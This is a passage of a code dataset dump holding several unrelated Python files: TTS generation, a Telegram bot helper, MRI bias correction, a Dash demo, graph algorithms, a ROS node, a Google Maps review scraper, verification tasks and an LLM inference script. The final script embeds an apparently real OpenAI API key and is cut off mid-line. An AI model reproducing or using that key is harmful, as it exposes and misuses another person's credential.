qtde*preco\n\nprint(preco)","repo_name":"gabriellaec/desoft-analise-exercicios","sub_path":"backup/user_053/ch159_2020_04_29_11_00_36_995442.py","file_name":"ch159_2020_04_29_11_00_36_995442.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12708711628","text":"import argparse\nfrom pathlib import Path\nfrom typing import Tuple, Dict, Any\nimport time\n\nimport torch\nimport numpy as np\n\nfrom models.fatchord_version import WaveRNN\nfrom models.tacotron import Tacotron\nfrom utils.display import simple_table\nfrom utils.dsp import DSP\nfrom utils.files import read_config\nfrom utils.paths import Paths\nfrom utils.text.cleaners import Cleaner\nfrom utils.text.tokenizer import Tokenizer\n\n\ndef load_taco(checkpoint_path: str) -> Tuple[Tacotron, Dict[str, Any]]:\n print(f'Loading tts checkpoint {checkpoint_path}')\n checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))\n config = checkpoint['config']\n tts_model = Tacotron.from_config(config)\n tts_model.load_state_dict(checkpoint['model'])\n print(f'Loaded taco with step {tts_model.get_step()}')\n return tts_model, config\n\n\ndef load_wavernn(checkpoint_path: str) -> Tuple[WaveRNN, Dict[str, Any]]:\n print(f'Loading voc checkpoint {checkpoint_path}')\n checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))\n config = checkpoint['config']\n voc_model = WaveRNN.from_config(config)\n voc_model.load_state_dict(checkpoint['model'])\n print(f'Loaded wavernn with step {voc_model.get_step()}')\n return voc_model, config\n\n\nif __name__ == '__main__':\n\n # Parse Arguments\n parser = argparse.ArgumentParser(description='TTS Generator')\n parser.add_argument('--input_text', '-i', default=None, type=str, help='[string] Type in something here and TTS will generate it!')\n parser.add_argument('--checkpoint', type=str, default=None, help='[string/path] path to .pt model file.')\n parser.add_argument('--config', metavar='FILE', default='config.yaml', help='The config containing all hyperparams. Only'\n 'used if no checkpoint is set.')\n parser.add_argument('--steps', type=int, default=1000, help='Max number of steps.')\n parser.add_argument('--cpu', action='store_true', help='Force CPU use.')\n parser.add_argument('--voc_checkpoint', type=str, default=None, help='[string/path] Load in different WaveRNN weights')\n\n\n # name of subcommand goes to args.vocoder\n subparsers = parser.add_subparsers(dest='vocoder')\n wr_parser = subparsers.add_parser('wavernn')\n wr_parser.add_argument('--overlap', '-o', default=550, type=int, help='[int] number of crossover samples')\n wr_parser.add_argument('--target', '-t', default=11_000, type=int, help='[int] number of samples in each batch index')\n\n gl_parser = subparsers.add_parser('griffinlim')\n mg_parser = subparsers.add_parser('melgan')\n\n args = parser.parse_args()\n \n print(args)\n\n assert args.vocoder in {'griffinlim', 'wavernn', 'melgan'}, \\\n 'Please provide a valid vocoder! 
Choices: [\\'griffinlim\\', \\'wavernn\\', \\'melgan\\']'\n\n checkpoint_path = args.checkpoint\n if checkpoint_path is None:\n config = read_config(args.config)\n paths = Paths(config['data_path'], config['voc_model_id'], config['tts_model_id'])\n checkpoint_path = paths.taco_checkpoints / 'latest_weights.pyt'\n\n tts_model, config = load_taco(checkpoint_path)\n dsp = DSP.from_config(config)\n \n voc_checkpoint_path = args.voc_checkpoint\n if voc_checkpoint_path is None:\n config = read_config(args.config)\n paths = Paths(config['data_path'], config['voc_model_id'], config['tts_model_id'])\n voc_checkpoint_path = paths.voc_checkpoints / 'latest_weights.pyt' \n\n voc_model, voc_dsp = None, None\n if args.vocoder == 'wavernn':\n voc_model, voc_config = load_wavernn(voc_checkpoint_path)\n voc_dsp = DSP.from_config(voc_config)\n\n out_path = Path('model_outputs')\n out_path.mkdir(parents=True, exist_ok=True)\n \n if torch.cuda.is_available() and not args.cpu:\n device = torch.device('cuda')\n else:\n device = torch.device('cpu')\n tts_model.to(device)\n cleaner = Cleaner.from_config(config)\n tokenizer = Tokenizer()\n\n print('Using device:', device)\n if args.input_text:\n texts = [args.input_text]\n else:\n with open('sentences.txt', 'r', encoding='utf-8') as f:\n texts = f.readlines()\n\n tts_k = tts_model.get_step() // 1000\n\n if args.vocoder == 'griffinlim':\n simple_table([('Forward Tacotron', str(tts_k) + 'k'),\n ('Vocoder Type', 'Griffin-Lim')])\n\n elif args.vocoder == 'melgan':\n simple_table([('Forward Tacotron', str(tts_k) + 'k'),\n ('Vocoder Type', 'MelGAN')])\n\n # simple amplification of pitch\n pitch_function = lambda x: x * args.amp\n \n concatenated = np.zeros([0], dtype=np.single)\n\n timestamp = int(time.time())\n for i, x in enumerate(texts, 1):\n print(f'\\n| Generating {i}/{len(texts)}')\n x = cleaner(x)\n x = tokenizer(x)\n x = torch.as_tensor(x, dtype=torch.long, device=device).unsqueeze(0)\n\n wav_name = f'{i}_taco_{tts_k}k_{args.vocoder}'\n\n _, m, _ = tts_model.generate(x=x, steps=args.steps)\n if args.vocoder == 'melgan':\n m = torch.tensor(m).unsqueeze(0)\n torch.save(m, out_path / f'{wav_name}.mel')\n if args.vocoder == 'wavernn':\n m = torch.tensor(m).unsqueeze(0)\n wav = voc_model.generate(mels=m,\n batched=True,\n target=args.target,\n overlap=args.overlap,\n mu_law=voc_dsp.mu_law)\n dsp.save_wav(wav, out_path / f'{timestamp}-{wav_name}.wav')\n elif args.vocoder == 'griffinlim':\n wav = dsp.griffinlim(m)\n dsp.save_wav(wav, out_path / f'{timestamp}-{wav_name}.wav') \n if args.vocoder != 'melgan':\n wav = np.append(wav, np.zeros(int(22050*0.25), dtype=np.single))\n concatenated = np.append(concatenated, wav)\n\n if len(texts) > 1:\n dsp.save_wav(concatenated, out_path / f'{timestamp}_taco_{tts_k}k_{args.vocoder}-full.wav')\n\n print('\\n\\nDone.\\n')\n","repo_name":"agheful/PajladaTTS","sub_path":"gen_tacotron.py","file_name":"gen_tacotron.py","file_ext":"py","file_size_in_byte":6129,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"2750764723","text":"#!/usr/bin/env python3\n\n# region * Imports\n\nfrom root.model.chat import Chat\nfrom telegram import User\nfrom root.constant.message import JOIN_MESSAGE\n# endregion\n\ndef create_chat(chat_id: int):\n try:\n Chat(chat_id=chat_id, admins=[], join_message=\"\").save()\n except Exception as e:\n print(f\"Unable to create chat: {e}\")\n\ndef retrieve_chat(chat_id: int):\n try:\n return Chat.objects().get(chat_id=chat_id)\n except Exception as e:\n 
print(f\"Unable to find the chat with id [{chat_id}]: {e}\")\n\n\ndef add_admin(chat_id: int, user_id: int):\n chat: Chat = retrieve_chat(chat_id)\n if chat:\n if not user_id in chat.admins:\n chat.admins.append(user_id)\n chat.save()\n\ndef get_welcome_message(chat_id: int, user: User):\n chat: Chat = retrieve_chat(chat_id)\n if chat:\n if chat.join_message:\n return chat.join_message\n return JOIN_MESSAGE(user)","repo_name":"nautilor/telegram-captcha-bot","sub_path":"root/helper/chat_helper.py","file_name":"chat_helper.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24648785121","text":"#!/usr/bin/env python3\n# PYTHON_ARGCOMPLETE_OK\n# coding: utf-8\n\nimport argparse\nimport argcomplete\nimport sys\nimport multiprocessing\nimport os\nfrom datetime import datetime\nfrom hippmapper.utils import endstatement\n\nfrom nipype.interfaces.ants import N4BiasFieldCorrection\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = \"3\"\n\n\ndef parsefn():\n parser = argparse.ArgumentParser(usage=\"%(prog)s -i [ in_img ] \\n\\n\"\n \"Bias field correct images using N4\")\n\n required = parser.add_argument_group('required arguments')\n required.add_argument('-i', '--in_img', type=str, required=True, metavar='',\n help=\"input image\")\n\n optional = parser.add_argument_group('optional arguments')\n\n optional.add_argument('-m', '--mask_img', type=str, metavar='', default=None,\n help=\"mask image before correction (default: %(default)s)\")\n optional.add_argument('-s', '--shrink', type=int, metavar='', default=3,\n help=\"shrink factor (default: %(default)s)\")\n\n optional.add_argument('-n', '--noise', type=float, metavar='', default=0.005,\n help=\"Noise parameter for histogram sharpening - deconvolution (default: %(default)s)\")\n optional.add_argument('-b', '--bspline', type=int, metavar='', default=300,\n help=\"Bspline distance (default: %(default)s)\")\n optional.add_argument('-k', '--fwhm', type=float, metavar='', default=0.3,\n help=\"FWHM for histogram sharpening - deconvolution (default: %(default)s)\")\n optional.add_argument('-it', '--iters', type=int, nargs='+', metavar='', default=[50, 50, 30, 20],\n help=\"Number of iterations for convergence (default: %(default)s)\")\n optional.add_argument('-t', '--thresh', type=int, metavar='', default=1e-6,\n help=\"Threshold for convergence (default: %(default)s)\")\n optional.add_argument('-o', '--out_img', type=str, metavar='', default=None,\n help=\"output image (default: %(default)s)\")\n\n # optional.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit\")\n\n return parser\n\n\ndef parse_inputs(parser, args):\n\n if isinstance(args, list):\n args = parser.parse_args(args)\n argcomplete.autocomplete(parser)\n\n in_img = args.in_img.strip()\n mask_img = args.mask_img\n shrink = args.shrink\n bspline = args.bspline\n iters = args.iters\n thresh = args.thresh\n out_img = args.out_img.strip() if args.out_img is not None else None\n\n return in_img, mask_img, shrink, bspline, iters, thresh, out_img\n\n\ndef main(args):\n parser = parsefn()\n [in_img, mask_img, shrink, bspline, iters, thresh, out_img] = parse_inputs(parser, args)\n\n if out_img is not None and os.path.exists(out_img):\n print(\"\\n %s already exists\" % out_img)\n\n else:\n\n start_time = datetime.now()\n\n n4 = N4BiasFieldCorrection()\n n4.inputs.dimension = 3\n n4.inputs.input_image = in_img\n n4.inputs.bspline_fitting_distance = bspline\n 
n4.inputs.shrink_factor = shrink\n n4.inputs.n_iterations = iters\n n4.inputs.convergence_threshold = thresh\n\n cpu_load = 0.9\n cpus = multiprocessing.cpu_count()\n ncpus = int(cpu_load * cpus)\n\n n4.inputs.num_threads = ncpus\n\n if mask_img is not None:\n n4.inputs.args = \"--mask-image %s\" % mask_img.strip()\n\n if out_img is not None:\n n4.inputs.output_image = out_img.strip()\n\n print(\"\\n bias field correcting %s \" % in_img)\n n4.terminal_output = \"none\"\n n4.run()\n\n endstatement.main('Bias field correction', '%s' % (datetime.now() - start_time))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n\n","repo_name":"AICONSlab/HippMapp3r","sub_path":"hippmapper/preprocess/biascorr.py","file_name":"biascorr.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"24591052432","text":"import dash\r\nimport plotly.express as px\r\nimport pandas as pd\r\nfrom dash import html, dcc\r\nfrom dash.dependencies import Input, Output, State\r\n# Apresentando callback pela primeira vez\r\n\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\n\r\n\r\napp.layout = html.Div([\r\n html.H6(\"Altere o valor abaixo para ver o callback em ação!\"),\r\n html.Div([\"Entrada:\",\r\n dcc.Input(id='my-input', value='Valor inicial', type='text')]),\r\n html.Br(),\r\n html.Div(id='my-output'),\r\n])\r\n\r\n@app.callback(\r\n Output(component_id='my-output', component_property='children'),\r\n [Input(component_id='my-input', component_property='value')]\r\n #estado state\r\n #ideia -> sempre que a propriedade value do componente my-input for alterada executa a função update_output_div e retorna o retorno da função para o componente my-output\r\n)\r\ndef update_output_div(input_value):\r\n return 'Saída: {}'.format(input_value)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)","repo_name":"AnaMarcacini/Asimov_Academy","sub_path":"Dashboards/Dash/Básico/callback_app1.py","file_name":"callback_app1.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21747531272","text":"# -*- coding: utf-8 -*-\n# created by makise, 2022/7/26\nimport concurrent.futures\nimport time\n\nimport pebble\n\n\n# experiment 2\ndef determine_robustness(size, labels, models, task):\n colors = [0, 0.2, 0.4, 0.6, 0.8, 1]\n robusts = []\n color_times = []\n for c in range(5):\n color_start_time = time.monotonic()\n position_range = (1, 28 - size + 1)\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [(step, 2 * step), (2 * step, 3 * step), (1, step), (3 * step, position_range[1])]\n robust = True\n for label in labels:\n start_time = time.monotonic()\n if not robust:\n break\n with pebble.ProcessPool(1) as pool:\n color = (colors[c], colors[c + 1])\n for i in range(4):\n a = position[i]\n b = position[i]\n size_a = (size, size)\n size_b = (size, size)\n future = pool.schedule(task, (models[i], label, a, b, size_a, size_b, color), timeout=60)\n try:\n print('label {}, a&b {}, size_a&b {}, color {}'.format(label, a, size_a, color), flush=True)\n task_start_time = time.monotonic()\n result = future.result()\n print(\"task end in \", time.monotonic() - task_start_time)\n except concurrent.futures.TimeoutError:\n print(\"timeout\", flush=True)\n result = 'unsat' # To keep format with return value of task\n 
if result == 'sat':\n robust = False\n break\n print(\"label {} end in {}\".format(label, time.monotonic() - start_time))\n robusts.append(robust)\n color_times.append(time.monotonic() - color_start_time)\n return robusts, color_times\n\n\n# experiment 1\ndef find_robust_lower_bound(l, u, labels, model, task):\n lower = l\n _, image_height, image_width = (1, 28, 28)\n upper = u\n upper_last_sat = upper\n iter_count = 0\n while upper - lower >= 1:\n iter_count += 1\n position_range = (1, image_height - lower + 1)\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [1, step, 2 * step, 3 * step, position_range[1]]\n robust = True\n for label in labels:\n start_time = time.monotonic()\n if not robust:\n break\n with pebble.ProcessPool(1) as pool:\n for i in range(4):\n a = (position[i], position[i + 1])\n b = (position[i], position[i + 1])\n size_a = (lower, upper)\n size_b = (lower, upper)\n future = pool.schedule(task, (model, label, a, b, size_a, size_b, (0, 0)))\n try:\n print('iteration {}: label {}, a&b {}, size_a&b {}'.format(iter_count, label, a, size_a),\n flush=True)\n task_start_time = time.monotonic()\n result = future.result(timeout=60)\n print(\"task end in \", time.monotonic() - task_start_time)\n except concurrent.futures.TimeoutError:\n future.cancel()\n print(\"iteration {} timeout\".format(iter_count), flush=True)\n result = 'unsat' # To keep format with return value of task\n if result == 'sat':\n robust = False\n break\n print(\"label {} end in {}\".format(label, time.monotonic() - start_time))\n if not robust:\n print(\"size {} is not robust\".format((lower, upper)), flush=True)\n upper_last_sat = upper\n upper = (upper + lower) // 2\n else:\n print(\"size {} is robust\".format((lower, upper)), flush=True)\n lower = upper\n upper = (upper_last_sat + lower) // 2\n return upper\n\n\ndef determine_robustness_color_fixed(sizes, labels, model, color, task):\n robusts = []\n size_times = []\n adversarial_examples = []\n timeout_count = 0\n total_num = 0\n for size in range(sizes[0], sizes[1] + 1):\n adversarial_example = {}\n print(\"size {}x{} starts:\".format(size, size))\n size_start_time = time.monotonic()\n position_range = (1, 28 - size + 1)\n step = (position_range[1] - position_range[0] + 1) // 4\n position = [(step, 2 * step), (2 * step, 3 * step), (1, step), (3 * step, position_range[1])]\n robust = True\n for label in labels:\n print(\"label {} starts:\".format(label))\n if not robust:\n break\n with pebble.ProcessPool(1) as pool:\n for i in range(4):\n total_num += 1\n a = position[i]\n b = position[i]\n size_a = (size, size)\n size_b = (size, size)\n future = pool.schedule(task, (model, label, a, b, size_a, size_b, (color, color)))\n try:\n result, result_input = future.result(timeout=60)\n except concurrent.futures.TimeoutError:\n future.cancel()\n print(\"timeout\", flush=True)\n timeout_count += 1\n result = 'unsat' # To keep format with return value of task\n if result == 'sat':\n robust = False\n adversarial_example['a'] = result_input[0]\n adversarial_example['size_a'] = result_input[1]\n adversarial_example['b'] = result_input[2]\n adversarial_example['size_b'] = result_input[3]\n adversarial_example['color'] = result_input[4]\n break\n print(\"label {} ends\".format(label))\n robusts.append(robust)\n size_times.append(time.monotonic() - size_start_time)\n adversarial_examples.append(adversarial_example)\n print(\"size {}x{} ends\".format(size, size))\n timeout_prop = timeout_count / total_num\n return robusts, adversarial_examples, 
size_times, timeout_prop\n\n\ndef determine_robustness_with_epsilon(size, labels, epsilon, model, task, workers, split):\n    task_start_time = time.monotonic()\n    robust = True\n    adversarial_example = {}\n    timeout_count = 0\n    total_num = 0\n    position_range = (1, 28 - size[0] + 1)\n    if split == 4:\n        step = (position_range[1] - position_range[0] + 1) // 4\n        position = [(step, 2 * step), (2 * step, 3 * step), (1, step), (3 * step, position_range[1])]\n    elif split == 5:\n        step = (position_range[1] - position_range[0] + 2) // 5\n        position = [(step, 2 * step), (2 * step, 3 * step), (3 * step, 4 * step), (1, step),\n                    (4 * step, position_range[1])]\n        # position = [(5, 10), (10, 15), (15, 20), (1, 5), (20, 24)]\n    else:\n        step = (position_range[1] - position_range[0] + 1) // split\n        position = [(max(1, i * step), min((i + 1) * step, position_range[1])) for i in range(split)]\n    for label in labels:\n        if not robust:\n            break\n        start_time = time.monotonic()\n        params_model = []\n        params_label = []\n        params_position_a = []\n        params_position_b = []\n        params_size = []\n        params_epsilon = []\n        for i in range(split):\n            for j in range(split):\n                params_model.append(model)\n                params_label.append(label)\n                params_position_a.append(position[i])\n                params_position_b.append(position[j])\n                params_size.append(size)\n                params_epsilon.append(epsilon)\n\n        with pebble.ProcessPool(workers) as pool:\n            future = pool.map(task, params_model, params_label, params_position_a, params_position_b, params_size,\n                              params_size, params_epsilon, timeout=60)\n            iterator = future.result()\n            while True:\n                try:\n                    total_num += 1\n                    result, result_input = next(iterator)\n                    print(\"result is \", result, flush=True)\n                    if result == 'sat':\n                        robust = False\n                        adversarial_example['a'] = result_input[0]\n                        adversarial_example['size_a'] = result_input[1]\n                        adversarial_example['b'] = result_input[2]\n                        adversarial_example['size_b'] = result_input[3]\n                        adversarial_example['epsilons'] = [result_input[i] for i in range(4, 4 + (28 * 28))]\n                        print(\"verification exit in idx at label {}\".format(label), flush=True)\n                        future.cancel()\n                except StopIteration:\n                    print(\"iterator ends\")\n                    break\n                except concurrent.futures.TimeoutError as error:\n                    print(\"timeout, \", error.args, flush=True)\n                    timeout_count += 1\n                except concurrent.futures.CancelledError as error:\n                    print(\"cancelled, \", error.args, flush=True)\n                except Exception:\n                    print(\"error\", flush=True)\n        print(\"label {} end in {}\".format(label, time.monotonic() - start_time), flush=True)\n    return robust, adversarial_example, timeout_count / total_num, time.monotonic() - task_start_time","repo_name":"MakiseGuo/OccRob","sub_path":"mnist/experiment/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70467841332","text":"carac = input('Digite uma cadeia de caracteres (até 255): ')\nwhile len(carac)>255:\n    print('Não pode ser mais de 255 caracteres')\n    carac = input('Digite novamente: ')\ncont_e = carac.count(' ')\ncont_p = len(carac.split())\ncont_A = carac.count('a') + carac.count('A')\ncont_v = 0\nfor c in carac.upper():\n    if c in 'AÁÀÃÂEÉÈÊIÍÌOÓÒÕÔUÚÙÛ':\n        cont_v += 1\nprint(f'A quantidade de espaços em branco é: {cont_e}; a quantidade de palavras é: {cont_p}; a quantidade de letras a é {cont_A} e a quantidade de vogais é 
{cont_v}')","repo_name":"atico0/python","sub_path":"300_ideias_p_programar/4.3.14.py","file_name":"4.3.14.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4418809680","text":"from collections import defaultdict\n\nclass Graph:\n\n def __init__(self, vertices):\n self.V = vertices\n self.gragh = defaultdict(list)\n\n def DFSUtil(self, v, visited):\n\n visited[v] = True\n\n for i in self.gragh[v]:\n if visited[i] == False:\n self.DFSUtil(i, visited)\n\n def addEdge(self, v, w):\n self.gragh[v].append(w)\n\n def findMother(self):\n\n #visited is for DFS\n visited = [False] * (self.V)\n motherVertex = 0\n\n for i in range(self.V):\n if visited[i] == False:\n self.DFSUtil(i, visited)\n motherVertex = i\n\n #We simply check is every vertex is reachable by v\n visited = [False] * (self.V)\n\n self.DFSUtil(motherVertex, visited)\n\n if any(i == False for i in visited):\n return -1\n\n else:\n return motherVertex\n\ng = Graph(7)\ng.addEdge(0, 1)\ng.addEdge(0, 2)\ng.addEdge(1, 3)\ng.addEdge(4, 1)\ng.addEdge(6, 4)\ng.addEdge(5, 6)\ng.addEdge(5, 2)\ng.addEdge(6, 0)\nprint (\"A mother vertex is \" + str(g.findMother()))\n\n\n\n\n\n\n\n","repo_name":"Taoge123/LeetCode","sub_path":"Graph/MotherVertex.py","file_name":"MotherVertex.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74284961334","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import PoseStamped\nfrom visualization_msgs.msg import Marker\n\nclass RoboDriver:\n def __init__(self):\n self.mk_msg = Marker()\n self.rate = rospy.Rate(10)\n self.odom_sub = rospy.Subscriber('/pose', PoseStamped, self.odom_callback)\n self.mark_pub = rospy.Publisher('markers', Marker, queue_size = 0)\n\n def odom_callback(self, msg):\n #print msg\n self.mk_msg.header.frame_id = msg.header.frame_id\n self.mk_msg.header.seq = msg.header.seq\n self.mk_msg.pose = msg.pose\n self.mk_msg.color.a = 1\n self.mk_msg.color.r = 1\n self.mk_msg.color.b = 1\n self.mk_msg.scale.x = 0.5;\n self.mk_msg.scale.y = 0.5;\n self.mk_msg.scale.z = 0.5;\n #self.mk_msg.pose.position.z = 0\n\n def main(self):\n while not rospy.is_shutdown():\n self.mark_pub.publish(self.mk_msg)\n self.rate.sleep() \n\nif __name__ == '__main__':\n rospy.init_node(\"get_position\")\n r = RoboDriver()\n r.main()\n","repo_name":"lec9243/cosc169_robotics","sub_path":"hw1_pack/scripts/hw1_task3.py","file_name":"hw1_task3.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3014651200","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport pandas as pd\nimport requests\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\ndef scrape(myurl1):\n\tchrome = webdriver.Chrome()\n\tdriver = chrome\n\tdriver.get(myurl1)\n\n\tdelay = 3# seconds\n\ttry:\n\t\tmyElem = WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.ID, 'content-container')))\n\t\tprint(\"Page is ready!\")\n\texcept 
TimeoutException:\n\t\tprint(\"Loading took too much time!\")\n\n\n\ttime.sleep(10)\n\n\n\n\n\treviewCount = len(driver.find_elements_by_xpath(\"//div[@class='section-review ripple-container']\"))\n\n\ttotalReviews = driver.find_elements_by_xpath('//*[@id=\"pane\"]/div/div[1]/div/div/div[3]/div[2]/div/div[2]/div[2]');\n\ttotalReviews = [i for i in totalReviews][0].text\n\ttotalReviews = int(totalReviews.split()[0])\n\tprint(str(totalReviews) + \" reviews found\")\n\n\t# loading a minimum of 50 reviews\n\twhile reviewCount < totalReviews: #<=== change this number based on your requirement\n\t\t#print(\"Scrolling to review number :\", reviewCount)\n\t\t# load the reviews\n\t\tdriver.find_element_by_xpath(\"//div[contains(@class,'section-loading-spinner')]\").location_once_scrolled_into_view \n\t\t# wait for loading the reviews\n\t\tWebDriverWait(driver,10).until(EC.presence_of_element_located((By.XPATH,\"//div[@class='section-loading-overlay-spinner'][@style='display:none']\")))\n\t\t# get the reviewsCount\n\t\treviewCount = len(driver.find_elements_by_class_name(\"section-review-content\"))\n\n\n\n\n\n\n\n\n\t# Get all content boxes\n\treviewers = []\n\tstars = []\n\tage = []\n\tcontent = []\n\n\tboxes = driver.find_elements_by_class_name('section-review-content')\n\tfor i in boxes:\n\t\ttemp_rev = i.find_elements_by_class_name('section-review-title')\n\t\tfor j in temp_rev:\n\t\t\treviewers.append(j.text);\n\n\ttemp_str = driver.find_elements_by_class_name('section-review-stars')\n\tstars = [q.get_attribute(\"aria-label\") for q in temp_str]\n\n\ttemp_age = driver.find_elements_by_class_name('section-review-publish-date')\n\tage = [t.text for t in temp_age]\n\n\ttemp_content = driver.find_elements_by_class_name('section-review-review-content')\n\tcontent = [c.text for c in temp_content]\n\n\t\t\n\t#print(reviewers, len(reviewers), '\\n\\n')\n\t#print(stars, len(stars), '\\n\\n')\n\t#print(age, len(age), '\\n\\n')\n\t#print(content, len(content), '\\n\\n')\n\n\treview_df = pd.DataFrame()\n\treview_df['Reviewer'] = reviewers\n\treview_df['Stars'] = stars\n\treview_df['Age'] = age\n\treview_df['Content'] = content\n\n\tprint(review_df)\n\tprint(\"Total Reviews Scraped = \", review_df.shape[0])\n\n\ttime.sleep(4)\n\tdriver.quit()\n\n\treturn review_df\n\n\n#myurl1 = \"https://www.google.com/maps/place/Tembusu+College/@1.3058932,103.7716691,17z/data=!4m7!3m6!1s0x31da1af50a2f1ebf:0x8aea55fe34ee4a51!8m2!3d1.3058932!4d103.7738578!9m1!1b1\"\n\nif __name__ == '__main__':\n\tmyurl1 = \"https://www.google.com/maps/place/Cinnamon+College/@1.3067015,103.7713382,17z/data=!4m7!3m6!1s0x31da1af5169c1e05:0xbf1136a704621ca3!8m2!3d1.3067015!4d103.7735269!9m1!1b1\"\n\tmyurl2 = \"https://www.google.com/maps/place/CMPB/@1.280195,103.815126,17z/data=!4m7!3m6!1s0x31da1bd0af54732f:0x9c274decbab4e599!8m2!3d1.280195!4d103.815126!9m1!1b1\"\n\tmydf = scrape(myurl2);\n\n\tmydf.to_csv('googlereviews.csv')\n\n\n\n\n","repo_name":"VibhuKrovvidi/BT4103CapstoneProject","sub_path":"code/scrapers-ns/googlereviews_scrape.py","file_name":"googlereviews_scrape.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21793877451","text":"from transformers import AutoConfig, LlamaForCausalLM, LlamaTokenizer,AutoModelForSeq2SeqLM, AutoTokenizer,AutoModelForCausalLM,pipeline\nimport openai\nopenai.api_key =\"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\"\nimport argparse\nimport pandas as pd\nfrom tqdm import tqdm\nimport 
datetime\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"--model\",type=str,default='vicuna-13b')\nparser.add_argument(\"--task\",type=str)\nparser.add_argument(\"--prompt_type\",type=str,choices=['basic_prompt','instructive_prompt','CoT_prompt'])\nargs=parser.parse_args()\n\nprompt_file=pd.read_csv(\"./prompt/\"+args.task+\"_task_prompt.csv\")\n\n\ndef generate(model_name,prompt_list,max_new_tokens=512,do_sample=False,num_beams=1,diversity_penalty=0.0,temperature=1.0,top_k=50,\\\n top_p=1,repetition_penalty=1):\n result_list=[]\n if model_name=='vicuna-13b':\n tokenizer = LlamaTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-13b-v1.5-16k/\")\n model = LlamaForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-13b-v1.5-16k/\",device_map='auto')\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n\n elif model_name=='vicuna-7b':\n tokenizer = LlamaTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-7b-v1.5-16k/\")\n model = LlamaForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/vicuna-7b-v1.5-16k/\",device_map='auto')\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n \n elif model_name=='flan-t5-xxl':\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/zhaoyunpu/flan-t5-xxl/\")\n model = AutoModelForSeq2SeqLM.from_pretrained(\"/lustre/S/zhaoyunpu/flan-t5-xxl/\",device_map='auto')\n \n elif model_name==\"flan-UL2\":\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/zhaoyunpu/flan-UL2/\")\n model = AutoModelForSeq2SeqLM.from_pretrained(\"/lustre/S/zhaoyunpu/flan-UL2/\",device_map='auto')\n \n elif model_name=='mpt-30b-chat':\n config = AutoConfig.from_pretrained(\"/lustre/S/zhaoyunpu/mpt-30b-chat/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/zhaoyunpu/mpt-30b-chat/\",config=config,device_map='auto',trust_remote_code=True)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/zhaoyunpu/mpt-30b-chat/\")\n \n elif model_name=='llama-2-13b':\n config = AutoConfig.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-13b-chat-hf/\",trust_remote_code=True)\n model = AutoModelForCausalLM.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-13b-chat-hf/\",config=config,device_map='auto',trust_remote_code=True)\n tokenizer = AutoTokenizer.from_pretrained(\"/lustre/S/liwenyi/llm/Llama-2-13b-chat-hf/\")\n generator = pipeline(model=model,tokenizer=tokenizer,device_map='auto',framework='pt',task='text-generation',\\\n max_new_tokens=max_new_tokens,do_sample=do_sample,num_beams=num_beams,diversity_penalty=diversity_penalty,\\\n temperature=temperature,top_k=top_k,top_p=top_p,repetition_penalty=repetition_penalty,min_new_tokens=10)\n\n elif 